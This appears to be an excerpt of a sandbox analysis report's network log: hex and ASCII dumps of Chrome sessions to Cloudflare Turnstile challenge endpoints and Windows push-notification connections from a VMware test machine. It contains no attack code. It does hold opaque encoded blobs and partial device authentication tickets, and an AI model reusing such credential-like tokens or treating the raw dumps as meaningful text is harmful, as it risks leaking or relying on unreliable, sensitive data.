                                                        2024-07-03 19:06:54 UTC1369INData Raw: 56 4b 4f 58 35 61 50 6d 4b 41 57 46 4a 54 52 57 47 4c 69 59 4e 6d 61 6c 31 6c 6a 55 39 6d 5a 55 39 53 59 32 65 57 65 6d 57 58 66 48 42 73 56 33 4a 76 6d 6e 35 2f 58 6f 43 58 66 5a 78 6e 69 34 74 35 69 4b 57 6b 6d 34 70 75 70 33 35 79 72 6e 47 6c 6e 4a 47 6d 76 5a 56 32 72 72 57 72 77 48 7a 44 78 38 47 56 6e 5a 69 63 68 72 32 73 68 36 69 76 75 34 79 6d 31 72 2b 75 79 72 4b 76 7a 61 71 37 30 37 48 4a 6e 38 2b 32 33 63 36 79 75 73 65 35 77 75 66 73 33 61 48 6b 76 4f 6d 75 39 4c 2f 4e 77 62 54 73 75 4d 66 4b 2f 73 76 70 32 63 73 45 2b 65 50 61 41 39 58 49 31 4f 76 4c 2f 75 33 41 35 50 6f 46 2b 2b 44 73 34 4e 2f 4f 36 2b 6b 4c 35 52 44 31 31 77 72 66 49 66 76 72 33 53 44 36 35 75 6a 38 42 2b 58 30 48 53 63 64 36 75 6a 77 2f 43 55 56 41 79 6b 4b 36 78 55 4e 4e
                                                        Data Ascii: VKOX5aPmKAWFJTRWGLiYNmal1ljU9mZU9SY2eWemWXfHBsV3Jvmn5/XoCXfZxni4t5iKWkm4pup35yrnGlnJGmvZV2rrWrwHzDx8GVnZichr2sh6ivu4ym1r+uyrKvzaq707HJn8+23c6yuse5wufs3aHkvOmu9L/NwbTsuMfK/svp2csE+ePaA9XI1OvL/u3A5PoF++Ds4N/O6+kL5RD11wrfIfvr3SD65uj8B+X0HScd6ujw/CUVAykK6xUNN
                                                        2024-07-03 19:06:54 UTC1369INData Raw: 36 57 49 41 2f 64 55 4a 48 51 31 36 4d 59 32 4e 51 63 6b 71 54 62 49 43 4f 64 33 69 51 55 30 31 76 61 49 70 75 55 6f 36 4b 64 31 75 67 65 6d 47 43 68 71 70 68 6f 6f 32 66 70 4b 53 52 6b 49 4e 7a 6a 6e 43 50 68 62 65 7a 72 58 6d 50 73 58 2b 51 66 4a 4f 32 73 4b 62 43 73 4b 4b 61 6b 71 4f 6b 78 63 58 4c 79 36 6e 4f 73 4e 4f 50 69 4a 2b 50 75 73 75 54 74 74 43 72 73 62 71 63 31 63 48 64 7a 38 54 61 6e 74 4f 37 74 62 66 63 71 4b 47 39 32 71 79 38 73 4d 75 74 79 4d 54 4a 75 50 76 4d 78 75 34 41 7a 41 44 69 32 39 7a 34 32 66 30 47 43 66 73 41 35 67 44 36 79 76 6a 4c 41 73 2f 71 31 64 48 4e 37 42 73 58 39 67 34 65 44 64 6b 54 31 78 58 69 39 50 6e 34 2f 75 67 41 4c 41 44 6f 41 41 73 6e 44 42 38 42 4e 66 41 73 49 54 55 51 39 44 63 50 46 50 6b 56 4b 54 54 34 46 7a
                                                        Data Ascii: 6WIA/dUJHQ16MY2NQckqTbICOd3iQU01vaIpuUo6Kd1ugemGChqphoo2fpKSRkINzjnCPhbezrXmPsX+QfJO2sKbCsKKakqOkxcXLy6nOsNOPiJ+PusuTttCrsbqc1cHdz8TantO7tbfcqKG92qy8sMutyMTJuPvMxu4AzADi29z42f0GCfsA5gD6yvjLAs/q1dHN7BsX9g4eDdkT1xXi9Pn4/ugALADoAAsnDB8BNfAsITUQ9DcPFPkVKTT4Fz
                                                        2024-07-03 19:06:54 UTC1369INData Raw: 53 6c 6c 57 69 6f 46 2b 57 6b 79 4e 61 6f 69 46 63 57 74 7a 5a 49 56 55 58 56 74 78 6b 5a 5a 55 58 6e 39 6a 6b 36 53 4a 6b 57 61 68 68 6e 65 67 6e 32 36 76 6b 4a 53 6a 6a 49 79 52 6f 61 4f 4c 71 36 79 7a 74 5a 6d 65 74 59 2b 32 6e 35 75 35 77 70 47 2f 6e 34 62 42 72 73 65 70 79 71 6d 65 6a 72 57 4f 6f 5a 48 4c 7a 39 43 70 72 4d 58 53 71 4c 36 34 6e 4c 32 32 75 74 50 45 79 4c 62 4b 78 4b 72 43 70 38 76 4b 71 37 4b 76 77 72 36 2b 37 50 53 32 73 4d 32 79 2b 4f 72 4a 31 65 79 37 34 39 6a 6a 33 77 63 48 39 41 66 47 2b 75 66 4c 37 2f 30 42 30 4d 6e 78 44 76 34 5a 34 78 4c 58 46 63 37 50 35 39 59 56 36 66 62 67 46 69 59 64 49 76 44 79 43 51 6a 6d 39 67 48 6d 2b 43 6f 49 4c 4f 76 78 49 78 63 4c 39 52 51 70 44 2f 55 70 2b 52 33 35 50 78 67 77 45 30 59 56 48 30 55
                                                        Data Ascii: SllWioF+WkyNaoiFcWtzZIVUXVtxkZZUXn9jk6SJkWahhnegn26vkJSjjIyRoaOLq6yztZmetY+2n5u5wpG/n4bBrsepyqmejrWOoZHLz9CprMXSqL64nL22utPEyLbKxKrCp8vKq7Kvwr6+7PS2sM2y+OrJ1ey749jj3wcH9AfG+ufL7/0B0MnxDv4Z4xLXFc7P59YV6fbgFiYdIvDyCQjm9gHm+CoILOvxIxcL9RQpD/Up+R35PxgwE0YVH0U
                                                        2024-07-03 19:06:54 UTC1369INData Raw: 34 61 53 63 49 70 78 68 33 4e 54 68 46 56 6d 6d 6d 65 48 6a 5a 71 44 67 6e 47 59 6f 6f 57 61 5a 59 57 57 6f 61 75 65 6f 4a 36 53 68 33 4a 78 73 6e 57 59 73 6d 2b 30 72 62 6d 79 73 34 35 32 69 71 48 42 6b 37 32 2b 67 38 43 59 70 4c 72 46 77 37 69 4b 77 71 47 77 72 59 7a 51 78 63 61 6c 70 4e 4b 6c 79 64 57 62 76 72 53 77 6d 75 50 66 33 75 4b 77 34 36 57 36 70 75 76 75 71 74 76 61 34 38 54 42 34 2b 62 74 77 65 33 74 79 2f 7a 55 2b 62 66 79 30 4e 76 41 34 41 58 35 35 51 66 44 39 64 58 6c 34 73 33 4f 37 2b 4d 46 37 63 30 41 30 38 7a 50 30 51 54 73 46 4f 2f 31 32 39 38 61 38 50 76 62 46 65 55 61 4a 2f 6e 6d 43 69 30 73 46 68 30 4d 41 43 72 37 48 41 30 69 4e 75 34 4f 36 79 4d 46 4d 52 4c 2b 4b 6b 49 6a 4c 52 59 45 52 76 30 6b 52 68 38 62 50 55 6b 64 52 68 68 4f
                                                        Data Ascii: 4aScIpxh3NThFVmmmeHjZqDgnGYooWaZYWWoaueoJ6Sh3JxsnWYsm+0rbmys452iqHBk72+g8CYpLrFw7iKwqGwrYzQxcalpNKlydWbvrSwmuPf3uKw46W6puvuqtva48TB4+btwe3ty/zU+bfy0NvA4AX55QfD9dXl4s3O7+MF7c0A08zP0QTsFO/1298a8PvbFeUaJ/nmCi0sFh0MACr7HA0iNu4O6yMFMRL+KkIjLRYERv0kRh8bPUkdRhhO
                                                        2024-07-03 19:06:54 UTC1369INData Raw: 56 58 64 35 79 59 64 49 71 64 6d 31 74 66 59 36 47 42 64 35 56 38 6f 35 32 59 69 36 4b 70 6a 4b 53 5a 68 70 32 53 6c 59 75 6b 6a 47 2b 72 70 61 79 76 66 70 43 4e 6d 59 75 73 67 4a 6d 41 78 72 2f 43 6c 34 4f 34 6a 4a 75 4a 69 63 47 6c 76 38 58 4f 74 72 4b 6e 79 4b 4f 33 75 73 6d 30 76 4e 72 67 31 39 58 5a 78 72 47 38 32 63 4f 32 70 4e 37 4b 77 65 44 68 34 39 43 2b 39 65 62 68 31 75 44 36 39 74 4c 74 74 4e 4b 39 38 37 6e 37 37 50 47 37 41 64 76 49 35 76 50 6e 41 74 37 75 7a 4f 6e 49 35 67 2f 39 38 68 62 74 35 51 6b 49 45 2f 4c 6d 39 65 7a 35 33 65 34 5a 2f 67 55 52 35 69 63 6e 4b 42 6f 65 48 51 6f 4e 49 44 4c 38 37 78 34 7a 4f 44 4d 4f 4d 6a 4d 56 50 67 30 70 4c 41 41 42 45 43 55 54 51 68 4d 7a 49 41 63 45 42 6a 31 4e 4b 7a 45 37 47 67 34 71 51 54 35 45 49
                                                        Data Ascii: VXd5yYdIqdm1tfY6GBd5V8o52Yi6KpjKSZhp2SlYukjG+rpayvfpCNmYusgJmAxr/Cl4O4jJuJicGlv8XOtrKnyKO3usm0vNrg19XZxrG82cO2pN7KweDh49C+9ebh1uD69tLttNK987n77PG7AdvI5vPnAt7uzOnI5g/98hbt5QkIE/Lm9ez53e4Z/gUR5icnKBoeHQoNIDL87x4zODMOMjMVPg0pLAABECUTQhMzIAcEBj1NKzE7Gg4qQT5EI
                                                        2024-07-03 19:06:54 UTC1369INData Raw: 34 6e 59 79 58 63 5a 43 53 67 70 57 70 66 61 5a 39 6d 4b 46 2f 6c 36 4f 66 6b 34 57 6c 70 36 78 30 6c 72 43 62 6f 36 32 61 63 4c 4f 73 77 59 43 37 78 62 2b 2b 68 5a 44 46 6e 4d 50 44 7a 4b 47 42 79 4d 75 50 78 38 7a 53 6b 38 2b 4f 32 4b 33 62 31 4e 61 62 33 39 2b 59 7a 4e 71 57 6e 2b 4c 44 74 39 62 58 79 62 6e 49 77 4f 75 36 35 4e 37 48 34 74 54 50 31 2b 43 30 38 39 6e 46 30 39 65 2f 33 2f 6a 55 2f 4f 48 62 75 50 50 47 35 67 62 56 78 75 7a 71 78 73 76 4d 35 50 51 55 34 74 44 74 44 75 45 59 47 76 45 47 39 78 55 65 45 2f 50 31 37 66 44 6c 39 64 72 6d 4a 77 62 6a 42 69 66 38 4b 41 41 55 36 65 6f 79 41 69 4d 4b 44 7a 51 6c 45 42 45 52 2b 52 34 79 4d 67 2f 2b 4a 68 78 46 45 68 6c 43 52 42 67 72 4a 45 68 4d 50 46 42 4b 4c 45 59 74 55 69 56 61 56 6a 6c 4b 4f 54
                                                        Data Ascii: 4nYyXcZCSgpWpfaZ9mKF/l6Ofk4Wlp6x0lrCbo62acLOswYC7xb++hZDFnMPDzKGByMuPx8zSk8+O2K3b1Nab39+YzNqWn+LDt9bXybnIwOu65N7H4tTP1+C089nF09e/3/jU/OHbuPPG5gbVxuzqxsvM5PQU4tDtDuEYGvEG9xUeE/P17fDl9drmJwbjBif8KAAU6eoyAiMKDzQlEBER+R4yMg/+JhxFEhlCRBgrJEhMPFBKLEYtUiVaVjlKOT
                                                        2024-07-03 19:06:54 UTC1369INData Raw: 6c 47 52 7a 71 6d 69 61 6d 4b 46 38 5a 71 4e 70 6e 49 53 71 74 71 2b 75 70 58 4a 33 64 34 36 38 6b 35 2b 2f 74 36 47 54 73 70 47 50 6e 72 32 5a 67 4b 47 56 6d 38 75 68 70 4a 7a 4b 70 61 47 65 78 64 69 6a 73 5a 4b 57 30 39 65 7a 30 4b 2b 35 76 39 75 35 72 2b 4f 2f 75 39 71 6b 30 2b 76 44 70 72 6e 48 77 71 6a 46 30 63 50 50 78 64 48 71 36 75 76 54 2b 63 6a 58 37 2b 33 73 32 63 49 41 2f 76 73 46 42 63 6a 42 34 41 6b 49 79 4d 2f 51 34 4f 63 4c 41 50 58 70 7a 77 76 74 35 4f 67 4f 37 77 6b 52 37 65 34 44 45 42 37 33 32 51 63 62 43 79 51 49 49 75 66 68 44 43 51 71 43 69 4d 52 43 4f 30 6a 44 67 58 33 4b 77 67 4e 47 78 6b 4c 44 42 55 35 4e 78 77 37 45 76 74 49 4a 77 55 4f 41 55 56 50 49 6c 41 67 49 78 4e 4c 57 52 42 49 52 31 74 65 4a 6a 51 30 58 42 39 68 4d 44 41
                                                        Data Ascii: lGRzqmiamKF8ZqNpnISqtq+upXJ3d468k5+/t6GTspGPnr2ZgKGVm8uhpJzKpaGexdijsZKW09ez0K+5v9u5r+O/u9qk0+vDprnHwqjF0cPPxdHq6uvT+cjX7+3s2cIA/vsFBcjB4AkIyM/Q4OcLAPXpzwvt5OgO7wkR7e4DEB732QcbCyQIIufhDCQqCiMRCO0jDgX3KwgNGxkLDBU5Nxw7EvtIJwUOAUVPIlAgIxNLWRBIR1teJjQ0XB9hMDA
                                                        2024-07-03 19:06:54 UTC1369INData Raw: 47 31 70 6e 34 4b 49 6d 6d 32 6d 69 33 4e 31 72 48 53 58 6e 49 53 36 64 36 43 77 6d 71 31 35 72 72 50 46 78 62 53 47 71 37 75 73 76 4d 33 45 68 38 54 4f 78 64 4f 73 79 4d 47 57 72 4c 61 33 6e 4c 65 6f 6d 36 36 71 7a 4d 79 67 75 74 72 42 6f 74 4b 36 79 4b 58 62 71 64 71 6e 33 36 2f 49 73 2b 4f 77 38 38 50 6c 37 39 54 47 72 38 37 38 31 62 72 74 41 66 67 48 41 67 58 5a 36 66 30 42 35 4f 6a 35 43 63 76 6d 34 77 4d 56 78 2f 44 69 38 39 50 70 43 66 44 30 32 51 2f 58 32 4f 30 62 37 75 55 6b 42 66 63 63 49 4f 55 64 41 51 33 71 4b 66 34 70 43 66 50 2b 2f 67 77 34 4d 67 77 51 47 68 73 52 4b 77 30 31 2f 51 45 6a 4f 68 67 77 4f 7a 67 68 4a 41 67 68 54 45 6b 4e 4a 41 38 52 45 55 31 54 55 46 45 53 54 31 4a 49 4d 43 39 51 4d 46 30 39 50 78 74 48 4f 57 6c 6e 51 54 56 62
                                                        Data Ascii: G1pn4KImm2mi3N1rHSXnIS6d6Cwmq15rrPFxbSGq7usvM3Eh8TOxdOsyMGWrLa3nLeom66qzMygutrBotK6yKXbqdqn36/Is+Ow88Pl79TGr8781brtAfgHAgXZ6f0B5Oj5Ccvm4wMVx/Di89PpCfD02Q/X2O0b7uUkBfccIOUdAQ3qKf4pCfP+/gw4MgwQGhsRKw01/QEjOhgwOzghJAghTEkNJA8REU1TUFEST1JIMC9QMF09PxtHOWlnQTVb


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.549759104.17.3.1844433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:53 UTC438OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:54 UTC240INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:06:53 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 61
                                                        Connection: close
                                                        cache-control: max-age=2629800, public
                                                        Server: cloudflare
                                                        CF-RAY: 89d927c76eab434a-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:06:54 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.549763104.17.3.1844433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:55 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1016911571:1720031246:aWlWO2XSgzbXSgRbyl1CFEiTI1VOUKePXlJl5xr3Kxo/89d927bb0859422d/9126e412fd5a54e HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:55 UTC375INHTTP/1.1 404 Not Found
                                                        Date: Wed, 03 Jul 2024 19:06:55 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 7
                                                        Connection: close
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        cf-chl-out: eu1EpEkCcqNgzurIy/LhGA==$64OnncWAQwSUOL04r7Wvmg==
                                                        Server: cloudflare
                                                        CF-RAY: 89d927d27c700dc7-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:06:55 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                        Data Ascii: invalid


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.549764104.17.2.1844433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:55 UTC775OUTGET /cdn-cgi/challenge-platform/h/g/i/89d927bb0859422d/1720033614003/48Eq3BNYqb_JyY1 HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normal
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:55 UTC200INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:06:55 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 61
                                                        Connection: close
                                                        Server: cloudflare
                                                        CF-RAY: 89d927d2ea3a7ce7-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:06:55 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 29 00 00 00 34 08 02 00 00 00 98 4a 86 e4 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDR)4JIDAT$IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.549767104.17.3.1844433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:56 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/89d927bb0859422d/1720033614003/48Eq3BNYqb_JyY1 HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:56 UTC200INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:06:56 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 61
                                                        Connection: close
                                                        Server: cloudflare
                                                        CF-RAY: 89d927d6eeefc42c-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:06:56 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 29 00 00 00 34 08 02 00 00 00 98 4a 86 e4 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDR)4JIDAT$IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36192.168.2.54976640.115.3.253443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:56 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 45 42 4c 79 47 6f 59 69 44 30 4b 46 57 52 53 56 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 34 36 64 66 65 37 64 32 66 33 62 63 37 38 31 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 305MS-CV: EBLyGoYiD0KFWRSV.1Context: e46dfe7d2f3bc781
                                                        2024-07-03 19:06:56 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                        2024-07-03 19:06:56 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 45 42 4c 79 47 6f 59 69 44 30 4b 46 57 52 53 56 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 34 36 64 66 65 37 64 32 66 33 62 63 37 38 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 77 65 64 71 39 69 6b 77 4f 2b 42 6c 6f 57 32 4a 71 59 70 46 78 73 2f 43 74 57 6f 35 48 58 48 5a 6d 59 53 39 65 66 6e 56 2f 67 55 34 4d 33 73 4c 4d 6c 55 42 79 38 6d 2b 41 63 35 64 32 50 34 53 4b 66 38 4d 53 57 6f 2b 59 30 5a 55 57 41 48 56 4a 79 44 61 2f 76 5a 6b 61 55 52 44 6a 77 71 51 77 68 4c 42 78 44 61 34 34 49 77 6a
                                                        Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: EBLyGoYiD0KFWRSV.2Context: e46dfe7d2f3bc781<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYwedq9ikwO+BloW2JqYpFxs/CtWo5HXHZmYS9efnV/gU4M3sLMlUBy8m+Ac5d2P4SKf8MSWo+Y0ZUWAHVJyDa/vZkaURDjwqQwhLBxDa44Iwj
                                                        2024-07-03 19:06:56 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 45 42 4c 79 47 6f 59 69 44 30 4b 46 57 52 53 56 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 34 36 64 66 65 37 64 32 66 33 62 63 37 38 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: EBLyGoYiD0KFWRSV.3Context: e46dfe7d2f3bc781<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                        2024-07-03 19:06:56 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2024-07-03 19:06:56 UTC58INData Raw: 4d 53 2d 43 56 3a 20 71 74 64 67 6f 54 64 42 6e 45 2b 6b 48 70 30 4d 4c 4c 31 59 50 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: qtdgoTdBnE+kHp0MLL1YPA.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37192.168.2.54976540.115.3.253443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:56 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 51 33 41 78 42 34 64 31 31 6b 6d 76 4e 47 68 35 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 66 38 39 65 30 38 62 63 36 34 39 66 38 34 63 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 305MS-CV: Q3AxB4d11kmvNGh5.1Context: df89e08bc649f84c
                                                        2024-07-03 19:06:56 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                        2024-07-03 19:06:56 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 51 33 41 78 42 34 64 31 31 6b 6d 76 4e 47 68 35 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 66 38 39 65 30 38 62 63 36 34 39 66 38 34 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 77 5a 2b 79 69 74 69 2f 4c 51 49 39 4b 42 37 74 65 43 72 7a 45 50 45 6a 71 59 55 6c 74 79 4f 56 56 74 2b 45 6e 7a 4d 61 58 42 34 68 31 51 7a 6c 58 6b 54 72 57 71 41 63 5a 37 57 6e 6c 4f 56 6b 68 38 63 6c 57 72 56 6b 51 64 6c 2b 4f 45 2f 72 35 30 67 74 6b 68 58 6f 6d 46 53 38 4c 62 6d 45 6d 5a 64 75 62 34 5a 63 37 65 44 65
